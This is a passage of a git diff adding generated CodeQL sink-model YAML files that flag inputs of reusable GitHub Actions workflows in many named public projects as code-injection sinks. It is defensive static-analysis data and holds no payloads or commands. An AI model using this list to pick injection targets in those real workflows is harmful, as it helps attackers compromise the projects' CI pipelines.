addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "input.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml new file mode 100644 index 000000000000..e87804d0cf85 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "input.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "input.dist-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml new file mode 100644 index 000000000000..0927d449d371 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml new file mode 100644 index 000000000000..a98bbaed725a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml new file mode 100644 index 000000000000..0beb8e432fe6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..0d0f030c6233 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml new file mode 100644 index 000000000000..3574c02b4ed0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml new file mode 100644 index 000000000000..1ce82c53df5e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml new file mode 100644 index 000000000000..f2eec6681d3e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml new file mode 100644 index 000000000000..a4a008154f56 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml new file mode 100644 index 000000000000..d85bd42f7a43 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml new file mode 100644 index 000000000000..391b22d88672 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml new file mode 100644 index 000000000000..962623cd9133 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml new file mode 100644 index 000000000000..99ce22f3f64f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml new file mode 100644 index 000000000000..e52acbad13ce --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml new file mode 100644 index 000000000000..989f9aae9376 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml new file mode 100644 index 000000000000..e34a4b3910b2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml new file mode 100644 index 000000000000..9a1991ddc814 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml new file mode 100644 index 000000000000..0316d82a5e3a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml new file mode 100644 index 000000000000..16d8ba2b9267 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml new file mode 100644 index 000000000000..1a59c9bf160b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml new file mode 100644 index 000000000000..fb13f2451d9d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml new file mode 100644 index 000000000000..ac92d435f745 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml new file mode 100644 index 000000000000..278801efa2d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml new file mode 100644 index 000000000000..f426656c0769 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml new file mode 100644 index 000000000000..17d1c687f62c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml new file mode 100644 index 000000000000..4a8e4cc4378e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml new file mode 100644 index 000000000000..803335289524 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml new file mode 100644 index 000000000000..b1a056e28364 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -0,0 +1,29 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-toolchain", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml new file mode 100644 index 000000000000..906eb810c89a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml new file mode 100644 index 000000000000..75469b1a80a2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml new file mode 100644 index 000000000000..192f1d690b5a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..d8f7648e808f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml new file mode 100644 index 000000000000..9789709eac7e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.test_name", "code-injection", "generated"] + - 